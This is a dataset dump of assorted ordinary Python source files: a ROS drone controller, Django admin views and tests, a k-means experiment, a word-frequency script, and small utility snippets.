dest='alarm_name', action='store',\n metavar='alarm_name', help='Name of the alarm')\n\n AlarmModify.addArguments(self)\n\n def getArguments(self):\n \"\"\"\n Extracts the specific arguments of this CLI\n \"\"\"\n\n AlarmModify.getArguments(self)\n\n if self.args.alarm_id is not None:\n self.alarm_id = self.args.alarm_id\n\n self.path = \"v1/alarm/{0}\".format(self.alarm_id)\n\n def getDescription(self):\n return 'Updates an alarm definition in an Boundary account'\n","sub_path":"boundary/alarm_update.py","file_name":"alarm_update.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"176848680","text":"import rospy\nfrom std_msgs.msg import Empty\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import JointState, Image\nfrom Intro_Robotics_Final_Project.msg import DroneCommand, TaggedImage, DroneMovementCommand\nfrom Globals import Globals as G\nimport time\n\n#This class deals with interactions between a single drone\n'''\nOverall: Working good, could eliminate camera joint sub, and should tweak\nthe intensity for drone movements. But note that intensity is limited to -1,1\n'''\nclass DroneController:\n pre_land = Twist()\n pre_land.linear.z = -1 #Can maybe increase this\n\n post_takeoff = Twist()\n post_takeoff.linear.z = -0.1\n last_image_time = 0.0\n\n frame_count = 0\n\n # Amount to move forward\n linear_x_movement_amount = 0.5\n linear_y_movement_amount = 0.2\n angle_rotate_amount = 0.3\n\n #Initializes object with pubs and subs for speciic namespace\n def __init__(self, namespace='/bebop'):\n self.ID = namespace\n #Pubs\n self.pilot_pub = rospy.Publisher(namespace + '/cmd_vel', Twist, queue_size=1)\n self.takeoff_pub = rospy.Publisher(namespace + '/takeoff', Empty, queue_size=1)\n self.land_pub = rospy.Publisher(namespace + '/land', Empty, queue_size=1)\n self.calibrate_pub = rospy.Publisher(namespace + '/flattrim', Empty, queue_size=1)#NOTE: Flat trim might have problems\n self.emergency_pub = rospy.Publisher(namespace + '/reset', Empty, queue_size=1)\n\n self.camera_joint_pub = rospy.Publisher(namespace + '/camera_control', Twist, queue_size=1)\n self.camera_image_pub = rospy.Publisher('/swarm/drone_image', TaggedImage, queue_size=1)\n\n #Subs\n self.pilot_sub = rospy.Subscriber('/swarm/drone_command', DroneMovementCommand, self.drone_command_callback)\n # self.camera_joint_sub = rospy.Subscriber(namespace + '/joint_states', JointState, self.camera_joint_callback)\n self.camera_image_sub = rospy.Subscriber(namespace + '/image_raw', Image, self.image_callback)\n\n rospy.sleep(2.0)\n\n################################################################################\n#Main methods and publisher methods\n\n #Loop to be run inside node script\n #TODO:\n #NOTE: Not sure if this is exactly what we need\n def run_node(self):\n while not rospy.is_shutdown():\n continue\n\n #If command is for this drone then move\n #DONE\n # def move_drone_callback(self, command):\n # self.move_drone(command)\n # print(self.ID,': command recieved->',command.cmd_type[0])\n\n #Move drone\n #DONE:\n #NOTE: Need to re-test this\n # def move_drone(self, command):\n # #Command is movement type\n # if command.cmd_type[0] == G.EMERGENCY:\n # self.failsafe()\n\n # elif command.cmd_type[0] == G.LAND:\n # self.land()\n\n # elif command.cmd_type[0] == G.TAKEOFF:\n # self.takeoff()\n\n # else:\n # movement = Twist()\n # default_intensity = 0.2\n\n # for i in range(len(command.cmd_type)):\n # if command.intensity[i] != 0:\n # default_intensity = command.intensity[i]\n\n # if command.cmd_type[i] == G.X:\n # movement.linear.x = default_intensity * command.direction[i]\n\n # elif command.cmd_type[i] == G.Y:\n # movement.linear.y = default_intensity * command.direction[i]\n\n # elif command.cmd_type[i] == G.Z:\n # movement.linear.z = default_intensity * command.direction[i]\n\n # elif command.cmd_type[i] == G.THETA:\n # # +==CCW, -==CW, i.e. follows unit circle\n # movement.angular.z = default_intensity * command.direction[i]\n\n # self.pilot_pub.publish(movement)\n\n #Tells drone to takeoff\n #DONE\n def takeoff(self):\n self.calibrate_pub.publish(Empty())\n self.move_camera()\n\n rospy.sleep(2.0)\n\n self.takeoff_pub.publish(Empty())\n\n rospy.sleep(2.0)\n\n # self.pilot_pub.publish(self.post_takeoff)\n\n print(\"Flying\")\n\n #Tells drone to land\n #DONE: Lowers drone a little bit before landing\n def land(self):\n self.pilot_pub.publish(self.pre_land) #Not sure this is needed\n\n rospy.sleep(1.0)\n\n self.land_pub.publish(Empty())\n\n #Set the new camera joint states based on joint_data\n #DONE: Defualt behavior is to move camera straight down\n #NOTE: API is unstable as per documentation, joint_data is Twist\n def move_camera(self, joint_data=None):\n if joint_data == None:\n joint_data = Twist()\n joint_data.angular.y = -90.0\n joint_data.angular.z = 0.0\n self.camera_joint_pub.publish(joint_data)\n\n #Stop moving the drone and land\n #DONE: This works well\n #NOTE: Using this in ros shutdown hooks works well\n def failsafe(self):\n self.emergency_pub.publish(Empty())\n self.land_pub.publish(Empty())\n\n def run_movement_command(self, movementCommand):\n if movementCommand == G.GO_FORWARD:\n self.fly_drone_forward()\n elif movementCommand == G.GO_BACKWARD:\n self.fly_drone_backward()\n elif movementCommand == G.GO_RIGHT:\n self.fly_drone_right()\n elif movementCommand == G.GO_LEFT:\n self.fly_drone_left()\n elif movementCommand == G.TURN_RIGHT:\n self.rotate_drone_right()\n elif movementCommand == G.TURN_LEFT:\n self.rotate_drone_left()\n elif movementCommand == G.DO_EMERGENCY:\n self.failsafe()\n elif movementCommand == G.DO_LAND:\n self.land()\n elif movementCommand == G.DO_TAKEOFF:\n self.takeoff()\n\n def fly_drone_forward(self):\n movement = Twist()\n movement.linear.x = self.linear_x_movement_amount\n self.pilot_pub.publish(movement)\n\n def fly_drone_backward(self):\n movement = Twist()\n movement.linear.x = -self.linear_x_movement_amount\n self.pilot_pub.publish(movement)\n\n def fly_drone_right(self):\n movement = Twist()\n movement.linear.y = -self.linear_y_movement_amount\n self.pilot_pub.publish(movement)\n\n def fly_drone_left(self):\n movement = Twist()\n movement.linear.y = self.linear_y_movement_amount\n self.pilot_pub.publish(movement)\n\n def rotate_drone_right(self):\n movement = Twist()\n movement.angular.z = self.angle_rotate_amount\n self.pilot_pub.publish(movement)\n\n def rotate_drone_left(self):\n movement = Twist()\n movement.angular.z = -self.angle_rotate_amount\n self.pilot_pub.publish(movement)\n\n################################################################################\n#Callbacks\n '''\n #Callback to update camera joint data\n #DONE:\n #NOTE: Probably dont need this\n def camera_joint_callback(self, data):\n self.curr_cam_joint = data\n '''\n\n ##### PUBLISH CALLBACKS\n\n #Callback to publish image data\n #DONE: Gather image data, tag it and then publish it\n #NOTE: Havent tested this yet\n def image_callback(self, data):\n if time.time()-self.last_image_time > 1.5:\n print('Publishing Image')\n drone_image = TaggedImage()\n drone_image.image = data\n drone_image.drone_id = self.ID\n\n self.camera_image_pub.publish(drone_image)\n self.last_image_time = time.time()\n\n ##### SUBSCRIBE CALLBACKS\n def drone_command_callback(self, data):\n movementCommand = data.movement_command\n print(\"Recieved Command: \", movementCommand)\n\n self.run_movement_command(movementCommand)\n\n # def image_callback(self, data):\n # self.frame_count += 1\n # if self.frame_count > 100:\n # print('Publishing Image')\n # drone_image = TaggedImage()\n # drone_image.image = data\n # drone_image.drone_id = self.ID\n #\n # self.camera_image_pub.publish(drone_image)\n # self.frame_count = 0\n\n################################################################################\n#Tests\n #PASS\n #NOTE: Landing == Falls out of sky\n def test_takeoffandland(self):\n self.takeoff()\n rospy.sleep(5.0)\n self.land()\n\n #PASS\n #NOTE: Intensity for movements probably needs to be increased\n def test_failsafe(self):\n self.takeoff()\n rospy.sleep(2.0)\n command = DroneCommand()\n command.cmd_type.append(G.Z)\n command.drone_id = self.ID\n command.intensity.append(0)\n command.direction.append(-1)\n\n self.move_drone(command)\n print('Waiting for SIGCHLD, will terminate in 10 seconds')\n rospy.sleep(10.0)\n self.failsafe()\n\n #PASS\n #NOTE: Intensity for movements probably needs to be increased\n def test_moveforward(self):\n self.takeoff()\n rospy.sleep(2.0)\n command = DroneCommand()\n command.cmd_type.append(G.X)\n command.drone_id = self.ID\n command.intensity.append(0)\n command.direction.append(1)\n\n self.move_drone(command)\n rospy.sleep(5.0)\n self.land()\n\n #Not yet tested\n #Mostly just need to tet camera data\n def test_generalfunction():\n self.takeoff()\n rospy.sleep(2.0)\n self.move_camera()\n\n command = DroneCommand()\n command.cmd_type.append(G.X)\n command.drone_id = self.ID\n command.intensity.append(0.3)\n command.direction.append(1)\n\n self.move_drone(command)\n rospy.sleep(10.0)\n\n command.cmd_type.append(G.THETA)\n command.drone_id = self.ID\n command.intensity.append(0)\n command.direction.append(1)\n\n self.move_drone(command)\n rospy.sleep(1.0)\n\n self.land\n","sub_path":"scripts/Drone_Control/drone_control_copy.py","file_name":"drone_control_copy.py","file_ext":"py","file_size_in_byte":9862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"560229346","text":"import numpy as np\n\ndef calc_cf(in_dist,compare_dist,bins):\n# Pass the distributions with number of bins\n real,edges=np.histogram(compare_dist,bins=bins,density=1)\n model,edges=np.histogram(in_dist,bins=bins,range=[np.amin(compare_dist),np.amax(compare_dist)],density=1)\n ret_val=np.zeros(len(real))\n for i in xrange(len(model)):\n if model[i]==0:\n ret_val[i]=real[i]\n else:\n ret_val[i]= (real[i]-model[i])/model[i]\n return ret_val\n\ndef apply_cf(cf, dist):\n#pass the hist values only\n ret_pop=np.zeros(len(dist))\n for i in xrange(len(dist)):\n if dist[i]==0:\n ret_pop[i]=cf[i]\n else:\n ret_pop[i]=dist[i] + dist[i]*cf[i]\n return (ret_pop)\n","sub_path":"lib/python/corr_fac.py","file_name":"corr_fac.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"101879384","text":"def fun1(i):\n for n in range(1, i):\n i *= n\n return i\n\n\nprint(fun1(5))\n\n\ndef fun2(n):\n if n == 1:\n return 1\n else:\n return n * fun1(n - 1)\nn = fun2(5)\nprint(n)\n","sub_path":"test-1/fun2.py","file_name":"fun2.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"569964862","text":"n=int(input())\np=list(map(int,input().split()))\nsai = p[0]\nanswer = 1\nfor i in range(1,n):\n if p[i-1]<=sai:\n sai=p[i-1]\n if sai >= p[i]:\n answer = answer + 1\nprint(answer)","sub_path":"Python_codes/p02791/s163368221.py","file_name":"s163368221.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"94750406","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom sklearn.datasets import make_blobs\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\n#import Indicators as ind\n\ndb_dir = 'db'\n\ndef remap(n, start1, stop1, start2, stop2):\n return ((n-start1)/(stop1-start1))*(stop2-start2)+start2\n\ndef distance(p1,p2):\n return np.sqrt((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)\n\ndef cluster_id_min_dist(dists, point, num_clusters):\n closer = np.inf\n closer_id = 0\n for k in range(num_clusters):\n if dists[k,point] < closer:\n closer = dists[k,point]\n closer_id = k\n return closer_id\n\nplot = False\nnum_points = 1000\nnum_clusters = 3\nchanged = True\n\nX, y = make_blobs(n_samples = num_points, n_features = 2, centers = num_clusters)\n\nticker = 'TSLA'\n#df = pd.read_csv(db_dir + '/{0}.csv'.format(ticker), parse_dates = True, index_col = 1)\n#df['RSI_10'] = ind.RSI(df,10)\n# old_X = np.array([[k.timestamp(),c] for k,c in zip(df.index, df['Close'].values)])\n#df = df.dropna()\n#old_X = np.array([[k.timestamp(),c,rsi] for k,c,rsi in zip(df.index, df['Close'].values, df['RSI_10'].values)])\n\n# old_X = old_X[np.random.choice(old_X.shape[0], len(old_X)//10, replace=False), :]\n\n# X = old_X.copy()\n# X[:,0] = np.random.rand(old_X.shape[0])*(385-92)+92\n\n# X = np.random.rand(old_X.shape[0], 3)*(385-92)+92\n# X[:,:-1] = old_X\n# X[:,-1] = df['Volume'].values\n\nlabels = [-1 for k in range(num_points)]\n# V = np.array([X[k] for k in np.random.choice(range(num_points), size = num_clusters, replace = False)])\n# print(V)\nC = np.array([0 for k in range(num_clusters)])\n\n# while changed:\n# changed = False\n#\n# dists = np.matrix([[0.0 for k in range(num_points)] for w in range(num_clusters)])\n# for k in range(num_clusters):\n# for w in range(num_points):\n# dists[k,w] = distance(V[k],X[w])\n#\n# C = np.array([0 for k in range(num_clusters)])\n# for k in range(num_points):\n# new_c = cluster_id_min_dist(dists, k, num_clusters)\n# C[new_c] += 1\n# if new_c != labels[k]:\n# changed = True\n# labels[k] = new_c\n#\n# # print(C)\n#\n# for k in range(num_clusters):\n# V[k] = 1/C[k] * sum([X[w] for w in range(num_points) if labels[w] == k])\n#\n# ax1 = plt.subplot2grid((2,1),(0,0), rowspan=1, colspan=1)\n# ax2 = plt.subplot2grid((2,1),(1,0), rowspan=1, colspan=1)\n\nif plot:\n fig1 = plt.figure()\n fig2 = plt.figure()\n ax1 = fig1.add_subplot(111, projection='3d')\n ax2 = fig2.add_subplot(111, projection='3d')\n\n\nkmeans = KMeans(n_clusters = num_clusters, init='random', algorithm='full')\nkmeans = kmeans.fit(X)\nlabels = kmeans.predict(X)\nV = kmeans.cluster_centers_\n\nplt.figure(1)\nplt.scatter(X[:,0],X[:,1], c = labels)\nplt.scatter(V[:,0],V[:,1], marker='*', c='#050505', s=500)\n\nplt.show()\n\n\n# --- Comparison - native K-Means --- #\n\nif plot:\n kmeans = KMeans(n_clusters = num_clusters, init='random', algorithm='full')\n kmeans = kmeans.fit(old_X)\n labels = kmeans.predict(old_X)\n C1 = kmeans.cluster_centers_\n\n # plt.figure(2)\n ax1.set_title(\"2d data\")\n ax1.scatter(old_X[:, 0], old_X[:, 2], old_X[:, 1], c=labels)\n ax1.scatter(C1[:, 0], C1[:, 2], C1[:, 1], marker='*', c=range(len(C1)), s=500)\n\nif plot:\n kmeans = KMeans(n_clusters = num_clusters, init='random', algorithm='full')\n kmeans = kmeans.fit(X)\n labels = kmeans.predict(X)\n C2 = kmeans.cluster_centers_\n\n # plt.figure(2)\n ax2.set_title(\"3d data\")\n # ax2.scatter(old_X[:, 0], X[:, 1], c = labels)\n ax2.scatter(X[:, 0], X[:, 2], X[:, 1], c = labels)\n # ax2.scatter(remap(C2[:, 0], 92, 385, min(C1[:,0]), max(C1[:,0])), C2[:, 1], marker='*', c=range(len(C2)), s=500)\n ax2.scatter(C2[:, 0], C2[:, 2], C2[:, 1], marker='*', c=range(len(C2)), s=500)\n\nif plot:\n plt.show()\n\n\n# --- Comparison - tensorflow K-Means --- #\n\n# import tensorflow as tf\n\n# def input_fn():\n# return tf.train.limit_epochs(tf.convert_to_tensor(X, dtype=tf.float32), num_epochs=1)\n#\n# tf_kmeans = tf.contrib.factorization.KMeansClustering(num_clusters=num_clusters, use_mini_batch=False)\n\n# train\n# num_iterations = 10\n# previous_centers = None\n# for _ in range(num_iterations):\n# tf_kmeans.train(input_fn)\n# cluster_centers = tf_kmeans.cluster_centers()\n# if previous_centers is not None:\n# print('delta:', cluster_centers - previous_centers)\n# previous_centers = cluster_centers\n# print('score:', tf_kmeans.score(input_fn))\n# print('cluster centers:', cluster_centers)\n\n# map the input points to their clusters\n# cluster_indices = list(tf_kmeans.predict_cluster_index(input_fn))\n# for i, point in enumerate(X):\n# cluster_index = cluster_indices[i]\n# center = cluster_centers[cluster_index]\n# print('point:', point, 'is in cluster', cluster_index, 'centered at', center)\n\n# plt.figure(3)\n# ax2.scatter(X[:, 0], X[:, 1], c=cluster_indices)\n# ax2.scatter(cluster_centers[:, 0], cluster_centers[:, 1], marker='*', c='#050505', s=500)\n\n# plt.show()\n","sub_path":"Tests/Tools_Tests/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"172585372","text":"import json\n\nfrom django.core.serializers import serialize\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.views import View\n\nfrom common import md5_\nfrom .models import TSysRole, TSysUser, TPublicNotice, TSlidesshow, TLuckyTicket, THouseVerify\n\n\n# Create your views here.\ndef login(request):\n # 分两种用户,一个是会员,一个管理员(系统)\n # print('--->', request.method)\n if request.method == 'POST':\n # print(request.POST)\n error = None\n\n username = request.POST['username'].strip()\n password = request.POST['password'].strip()\n remeber = request.POST.get('remeber', '') # checkbox\n\n password_ = md5_.hash_encode(password) # 转成md5后的密文\n print(password_)\n\n # 验证用户名和口令是否为空\n if not all((username, password)):\n error = f'用户名或口令不能为空!'\n\n else:\n login_user = TSysUser.objects.filter(username=username, password=password_).first()\n if login_user:\n # 超级管理员\n role_ = login_user.role\n\n login_info = {\n 'user_id': login_user.user_id,\n 'head': str(login_user.head),\n 'email': login_user.email,\n 'nick_name': login_user.nick_name,\n 'role_name': role_.role_name,\n 'role_code': role_.role_code,\n }\n\n else:\n error = f'{username} 用户名或口令错误!'\n\n if not error:\n request.session['login_user'] = login_info\n return redirect(reverse('main:dash'))\n return render(request, 'login.html', locals())\n\n\ndef dashboard(request):\n \"\"\"\n 登陆之后主页界面\n :param request:\n :return:\n \"\"\"\n notices = TPublicNotice.objects.filter(public_status=1)\n return render(request, 'dashboard.html', locals())\n\n\ndef role(request):\n \"\"\"\n 查看角色页面和删除角色\n :param request:\n :return:\n \"\"\"\n action = request.GET.get('action', '')\n if action == 'del':\n role_id = request.GET.get('role_id')\n TSysRole.objects.get(role_id=role_id).delete()\n user_list = TSysUser.objects.filter(role_id=role_id)\n for obj in user_list:\n obj.delete()\n\n roles = TSysRole.objects.all()\n return render(request, 'role/list.html', locals()) #\n\n\ndef list_sys_user(request):\n \"\"\"\n 查看所有管理员和删除管理员\n :param request:\n :return:\n \"\"\"\n action = request.GET.get('action', '')\n if action == 'del':\n TSysUser.objects.get(user_id=request.GET.get('user_id')).delete()\n\n # 查询系统时,除去超级管理员的用户\n users = TSysUser.objects.filter(~Q(user_id=request.session['login_user']['user_id'])).all()\n return render(request, 'sys_user/list.html', locals())\n\n\nclass EditRoleView(View): # 编辑角色信息\n \"\"\"\n 编辑角色信息和增加角色信息\n \"\"\"\n def get(self, request):\n role_id = request.GET.get('role_id', '')\n if role_id:\n role = TSysRole.objects.get(role_id=role_id)\n return render(request, 'role/edit.html', locals())\n\n def post(self, request):\n from .forms import RoleForm\n role_id = request.POST.get('role_id', '')\n if role_id:\n form = RoleForm(request.POST, instance=TSysRole.objects.get(role_id=role_id))\n else:\n form = RoleForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(reverse('main:role'))\n\n errors = json.loads(form.errors.as_json())\n return render(request, 'role/edit.html', locals())\n\n\nclass EditSysUserView(View):\n \"\"\"\n 编辑管理员信息和增加管理员\n \"\"\"\n def get(self, request):\n user_id = request.GET.get('user_id', '')\n if user_id:\n obj = TSysUser.objects.get(user_id=user_id)\n\n roles = TSysRole.objects.filter(~Q(role_code='admin'))\n return render(request, 'sys_user/edit.html', locals())\n\n def post(self, request):\n from .forms import SysUserForm\n # print(request.POST,\"+++++++++++++++++++++\")\n user_id = request.POST.get('user_id', '')\n if user_id:\n form = SysUserForm(request.POST, request.FILES, instance=TSysUser.objects.get(user_id=user_id))\n else:\n form = SysUserForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect(reverse('main:list_sysuser'))\n\n errors = json.loads(form.errors.as_json())\n\n roles = TSysRole.objects.filter(~Q(code='admin'))\n\n return render(request, 'sys_user/edit.html', locals())\n\n\ndef logout(request):\n # 退出\n del request.session['login_user']\n return redirect(reverse(\"main:login\"))\n\n\ndef notice(request):\n notices = TPublicNotice.objects.all()\n action = request.GET.get('action', '')\n if action:\n TPublicNotice.objects.get(public_notice_id=request.GET.get('public_notice_id')).delete()\n return render(request, 'notice/list.html', locals())\n\n\nclass EditPublicNotice(View): # 编辑公告\n def get(self, request):\n public_notice_id = request.GET.get('public_notice_id', '')\n if public_notice_id:\n notice = TPublicNotice.objects.get(public_notice_id=public_notice_id)\n return render(request, 'notice/edit.html', locals())\n\n def post(self, request):\n from .forms import NoticeForm\n\n public_notice_id = request.POST.get('public_notice_id', '')\n if public_notice_id:\n notice = TPublicNotice.objects.get(public_notice_id=public_notice_id)\n form = NoticeForm(request.POST, instance=notice)\n\n else:\n form = NoticeForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect(reverse('main:notice'))\n\n errors = json.loads(form.errors.as_json())\n return render(request, 'notice/edit.html', locals())\n\n\ndef list_slide_show(request):\n action = request.GET.get('action', '')\n if action == 'del':\n TSlidesshow.objects.get(pk=request.GET.get('id_')).delete()\n slides = TSlidesshow.objects.all()\n return render(request, 'sys_user/list_sildeshow.html', locals())\n\n\nclass EditSlideWhowView(View):\n def get(self, request):\n id_ = request.GET.get('id_', '')\n if id_:\n obj = TSlidesshow.objects.get(pk=id_)\n\n return render(request, 'sys_user/edit_slide.html', locals())\n\n def post(self, request):\n from .forms import SlideForm\n id_ = request.POST.get('id', '')\n if id_:\n form = SlideForm(request.POST, instance=TSlidesshow.objects.get(pk=id_))\n else:\n form = SlideForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('/list_sildeshow/')\n\n errors = json.loads(form.errors.as_json())\n\n return render(request, 'sys_user/edit_slide.html', locals())\n\n\ndef list_lucky(request):\n action = request.GET.get('action', '')\n if action == 'del':\n TLuckyTicket.objects.get(pk=request.GET.get('id_')).delete()\n tickets = TLuckyTicket.objects.all()\n return render(request, 'sys_user/list_lucky.html', locals())\n\n\nclass EditLuckyView(View):\n def get(self, request):\n id_ = request.GET.get('id_', '')\n if id_:\n obj = TLuckyTicket.objects.get(pk=id_)\n\n return render(request, 'sys_user/edit_lucky.html', locals())\n\n def post(self, request):\n from .forms import LuckyForm\n id_ = request.POST.get('id', '')\n begin = request.POST.get('begin_time')\n print(f'------->>>{begin}---{type(begin)}')\n if id_:\n form = LuckyForm(request.POST, instance=TLuckyTicket.objects.get(pk=id_))\n else:\n form = LuckyForm(request.POST)\n\n if form.is_valid():\n form.save()\n return redirect('/lucky_ticket/')\n\n errors = json.loads(form.errors.as_json())\n\n return render(request, 'sys_user/edit_lucky.html', locals())\n\n\nclass AuditMessage(View):\n def get(self, request):\n action = request.GET.get('action', '')\n if action:\n obj = THouseVerify.objects.get(pk=request.GET.get('id_'))\n\n if action == 'yes':\n obj.verify_status = 1\n elif action == 'no':\n obj.verify_status = 2\n obj.remarks = request.GET.get('remarks', '')\n obj.save()\n obj.full_clean()\n\n\n objs = THouseVerify.objects.filter(verify_status=0).all()\n return render(request, 'message/list_audit.html', locals())\n\n\nclass TPublic(View):\n def get(self, request):\n action = request.GET.get('action', '')\n public_status = request.GET.get('public_status','')\n if action:\n obj = TPublicNotice.objects.get(pk=request.GET.get('id_'))\n if action == 'yes':\n obj.public_status = 1\n elif action == 'no':\n obj.public_status = 2\n obj.remarks = request.GET.get(' public_remarks', '')\n obj.save()\n obj.full_clean()\n\n if public_status:\n objs = TPublicNotice.objects.filter(public_status=1).all()\n else:\n objs = TPublicNotice.objects.filter(public_status=0).all()\n return render(request, 'message/list_public.html', locals())\n\n\nfrom mainapp.models import TComplaint\ndef get_complain(request):\n # get请求参数:action 有三个可选值(yes, del, query)\n # yes和del 都有一个额外参数:id_(投诉的ID)\n # query 有一个参数wd:可以按照订单号或者用户账号、手机号搜索都行\n action = request.GET.get('action', '')\n if action=='yes':\n obj = TComplaint.objects.get(pk=request.GET.get('id_'))\n obj.state = 1\n obj.save()\n obj.full_clean()\n if action=='del':\n TComplaint.objects.get(pk=request.GET.get('id_')).delete()\n # 查看评论主页\n complains = TComplaint.objects.all()\n return render(request, 'complaint/list.html', locals())\n\n\nfrom mainapp.models import TComment\ndef get_comment(request):\n\n # get请求参数:action 有三个可选值(yes, del, query)\n # yes和del 都有一个额外参数:id_(投诉的ID)\n # query 有一个参数wd:可以按照订单号或者用户账号、手机号搜索都行\n action = request.GET.get('action', '')\n if action == 'yes':\n obj = TComment.objects.get(pk=request.GET.get('id_'))\n obj.state = 1\n obj.save()\n obj.full_clean()\n if action == 'del':\n TComment.objects.get(pk=request.GET.get('id_')).delete()\n comments = TComment.objects.all()\n return render(request, 'comment/list.html', locals())\n","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638177788","text":"#\n# Задание 5\n# Создайте строку, в которой написан, какой-то текст. Пример:\n# We are not what we should be!\n# We are not what we need to be.\n# But at least we are not what we used to be\n# (Football Coach)\n# Посчитайте сколько слов в тексте (разбейте на слова методом строк split)\n# Удалите знаки препинания (пройдитесь циклом все слова и удалите методом strip знаки препинания)\n# Выведите слова в алфавитном порядке (найдите метод списка, который сортирует)\n#\n# Усложнённое ** (можно сначала его не делать):\n# Посчитать, сколько раз встречается каждое слово.\n# (Подсказка: создавать словарь, где ключи — это слова из текста,\n# а в значениях подсчитываем количество «встречаний» этого слова)\n\n\ndef text_number_of_words(text) :\n ttt = text.split(' ')\n return len(ttt)\n\n\ndef text_without_punctuation(text) :\n ttt = text.strip()\n ttt = ttt.replace(\"\\n\", \" \")\n ttt = ttt.replace(\". \", \" \")\n ttt = ttt.replace(\" - \", \" \")\n ttt = ttt.replace(\",\", \"\")\n ttt = ttt.replace(\"!\", \"\")\n ttt = ttt.replace(\"?\", \"\")\n ttt = ttt.replace(\" \", \" \")\n return ttt\n\n\ndef text_dictionary_of_words(text) :\n ttt = text_without_punctuation(text)\n ttt = ttt.split(\" \")\n ttt.sort()\n return ttt\n\n\ndef text_frequency_analysis(text) :\n ttt = text_dictionary_of_words(text)\n ddd = {}\n for www in ttt : # перебрать все слова в списке\n if www.isalnum() and not ddd.get(www) : # если слово отсутствует в словаре, то...\n qqq = ttt.count(www) # посчитать количество этих слов в списке\n ddd[www] = qqq # и добавить в словарь новый элемент\n return ddd\n\n\nsss = \"\"\"\nCamping is really not my cup of tea \nso I’m going to visit my friend in New York instead.\n\nDon’t trouble yourself cooking such a big meal. I eat like a bird.\n\nMy mother has to cook a lot of food when my brother comes to visit. \nHe eats like a horse.\n \"\"\"\nprint(\"Исходный текст:\\n\", sss)\nprint(\"Количество слов в тексте:\", text_number_of_words(sss))\nprint(\"Текст без знаков пунктуации:\\n\", text_without_punctuation(sss))\nprint(\"Словарный состав текста:\\n\", text_dictionary_of_words(sss))\nqqq = text_frequency_analysis(sss)\nprint(\"Частотный анализ текста:\\n\", qqq)\nprint(\"Количество уникальных слов:\", len(qqq))\n\n","sub_path":"hw03_05.py","file_name":"hw03_05.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"25447782","text":"# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom rest_search import connections\nfrom rest_search.tasks import (create_index, delete_index, patch_index,\n update_index)\nfrom tests.models import Book\nfrom tests.utils import patch\n\n\nclass TasksTest(TestCase):\n def setUp(self):\n Book.objects.create(id=1, title='Some book')\n\n @patch('elasticsearch.client.indices.IndicesClient.exists')\n @patch('elasticsearch.client.indices.IndicesClient.create')\n def test_create_index(self, mock_create, mock_exists):\n mock_exists.return_value = False\n\n create_index()\n mock_exists.assert_called_with('bogus')\n mock_create.assert_called_with(\n index='bogus',\n body={\n 'mappings': {\n 'Book': {\n 'properties': {\n 'tags': {\n 'index': 'not_analyzed',\n 'type': 'string',\n }\n }\n }\n },\n 'settings': {\n 'analysis': {\n 'analyzer': {\n 'default': {\n 'tokenizer': 'standard',\n 'filter': [\n 'standard',\n 'lowercase',\n 'asciifolding',\n ]\n },\n }\n }\n }\n }\n )\n\n @patch('elasticsearch.client.indices.IndicesClient.exists')\n @patch('elasticsearch.client.indices.IndicesClient.create')\n def test_create_index_exists(self, mock_create, mock_exists):\n mock_exists.return_value = True\n\n create_index()\n mock_exists.assert_called_with('bogus')\n mock_create.assert_not_called()\n\n @patch('elasticsearch.client.indices.IndicesClient.delete')\n def test_delete_index(self, mock_delete):\n delete_index(connections['default'])\n mock_delete.assert_called_with(\n index='bogus',\n ignore=404\n )\n\n @patch('rest_search.tasks.bulk')\n def test_patch_index(self, mock_bulk):\n patch_index({\n 'Book': [1],\n })\n self.assertEqual(len(mock_bulk.call_args_list), 1)\n\n @patch('elasticsearch.client.indices.IndicesClient.exists')\n @patch('elasticsearch.client.indices.IndicesClient.create')\n @patch('rest_search.tasks.bulk')\n def test_update_index(self, mock_bulk, mock_create, mock_exists):\n mock_exists.return_value = False\n\n update_index()\n mock_exists.assert_called_with('bogus')\n mock_create.assert_called_with(\n index='bogus',\n body={\n 'mappings': {\n 'Book': {\n 'properties': {\n 'tags': {\n 'index': 'not_analyzed',\n 'type': 'string',\n }\n }\n }\n },\n 'settings': {\n 'analysis': {\n 'analyzer': {\n 'default': {\n 'tokenizer': 'standard',\n 'filter': [\n 'standard',\n 'lowercase',\n 'asciifolding',\n ]\n },\n }\n }\n }\n }\n )\n\n self.assertEqual(len(mock_bulk.call_args_list), 1)\n","sub_path":"tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"378312850","text":"from . import api\nfrom flask import request, Response, url_for\nimport json\nfrom . import _create_etag, JsonResponse\nfrom . import log\nfrom . import models\nfrom . import db\nfrom . import read_resource\nimport mimetypes\n\n@api.route('/', methods=['GET'])\ndef get_test():\n log.debug('Yes, you got to the API 